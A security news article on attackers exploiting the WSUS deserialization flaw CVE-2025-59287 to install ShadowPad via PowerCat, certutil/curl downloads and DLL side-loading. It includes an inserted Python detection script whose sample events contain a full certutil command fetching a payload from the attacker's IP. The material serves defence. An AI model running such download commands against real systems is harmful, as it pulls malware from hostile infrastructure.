Microsoft WSUS Vulnerability Exploited to Spread ShadowPad Malware
A significant security vulnerability in Microsoft Windows Server Update Services (WSUS) is now being exploited in the wild to deploy ShadowPad malware. The attacks leverage the CVE-2025-59287 flaw, which gives attackers unauthorized access to systems running WSUS.
Understanding the Vulnerability
CVE-2025-59287 pertains to a critical deserialization vulnerability within WSUS that can lead to remote code execution with system privileges. Microsoft patched this vulnerability last month, but since then, it has been heavily exploited by malicious actors. According to a report by the AhnLab Security Intelligence Center (ASEC), attackers are specifically focusing on publicly exposed WSUS instances to gain initial access and perform reconnaissance actions.
Shadows of Espionage: The ShadowPad Malware
ShadowPad isn’t just any piece of malware; it’s identified as a successor to the well-known PlugX backdoor and has been an essential tool for state-sponsored hacking groups, particularly from China, since its emergence in 2015. Security experts at SentinelOne described it in a past analysis as a “masterpiece of privately sold malware in Chinese espionage.”
Once attackers exploit the CVE-2025-59287 flaw, they employ PowerCat, an open-source PowerShell-based utility, to create a system shell (CMD). Following this initial access, they use command-line tools such as certutil and curl to download and install ShadowPad onto the compromised server.
The Mechanics of the Attack
The documented attacks show adversaries using the deserialization flaw to execute Windows utilities such as curl.exe and certutil.exe. These utilities connect to an external server, “149.28.78[.]189:42306,” from which the malware is downloaded.
ShadowPad is launched through DLL side-loading: the legitimate binary “ETDCtrlHelper.exe” is made to load a malicious DLL, “ETDApix.dll,” placed alongside it. This DLL acts as a memory-resident loader, which helps the malware operate without being detected.
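The chain described above (WSUS process spawning a shell, certutil/curl fetching from the reported server, ETDCtrlHelper.exe loading ETDApix.dll from an unexpected location) can be turned into simple detection rules over process-creation and image-load telemetry. The following is an added example, not code from the article or from ASEC; it assumes Sysmon-style event fields (EventID 1 and 7, ParentImage, Image, CommandLine, ImageLoaded), assumes that WSUS runs as WsusService.exe or the IIS worker w3wp.exe, and uses constructed sample events rather than real telemetry.

```python
"""Constructed detection logic for the WSUS -> ShadowPad chain (added example)."""
import re

# Assumption: processes that host WSUS and should never spawn shells or download tools.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
# Living-off-the-land binaries named in the report, plus the shell that PowerCat produces.
LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe", "curl.exe"}
# Download server quoted in the report (defanged there as 149.28.78[.]189:42306).
C2_RE = re.compile(r"149\.28\.78\[?\.\]?189:42306")

def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names the event trips (empty if nothing matched)."""
    hits = []
    if event.get("EventID") == 1:  # process creation
        parent = _basename(event.get("ParentImage", ""))
        image = _basename(event.get("Image", ""))
        cmd = event.get("CommandLine", "")
        if parent in WSUS_PARENTS and image in LOLBINS:
            hits.append("wsus_spawns_lolbin")
        if image in {"certutil.exe", "curl.exe"} and (C2_RE.search(cmd) or "-urlcache" in cmd.lower()):
            hits.append("lolbin_download")
    elif event.get("EventID") == 7:  # image load
        image = _basename(event.get("Image", ""))
        loaded = event.get("ImageLoaded", "")
        # Assumption: a legitimate ETDCtrlHelper.exe loads ETDApix.dll from under Program Files.
        if image == "etdctrlhelper.exe" and _basename(loaded) == "etdapix.dll" \
                and not loaded.lower().startswith("c:\\program files"):
            hits.append("sideload_etdapix")
    return hits

def scan(events):
    """Index/rule pairs for every event that trips at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

# Constructed sample events (not real telemetry); the URL path and drop folder are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell.exe -NoProfile"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://149.28.78.189:42306/x C:\\Users\\Public\\ETDApix.dll"},
    {"EventID": 7, "Image": r"C:\Users\Public\ETDCtrlHelper.exe", "ImageLoaded": r"C:\Users\Public\ETDApix.dll"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the benign notepad launch alone; in production the first rule (a WSUS process spawning any of these tools) is the highest-signal one, since it fires regardless of which download server or DLL name a later campaign uses.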
The Functionality of ShadowPad
Once installed, ShadowPad launches a core module that loads additional plugins directly into memory. This design makes it versatile and equips it with numerous anti-detection and persistence techniques, which the malware uses to evade security controls while it operates.
Implications of the Exploit
Following the public availability of a proof-of-concept exploit for CVE-2025-59287, the speed at which attackers were able to weaponize this vulnerability reflects the potential severity of the issue. As AhnLab highlighted, this vulnerability is particularly alarming due to its capability to facilitate remote code execution with system-level permissions. This significantly raises the stakes for organizations exposed to this threat.
As organizations continue to implement and rely on WSUS for updating their systems, the urgency to address this vulnerability is paramount. Regularly updating and securing these services is critical not just for protecting against ShadowPad, but for overall cybersecurity hygiene.
By understanding the nature of the vulnerability and the tactics employed by malicious actors, organizations can adopt more effective defensive measures to safeguard their systems and sensitive data against potential breaches.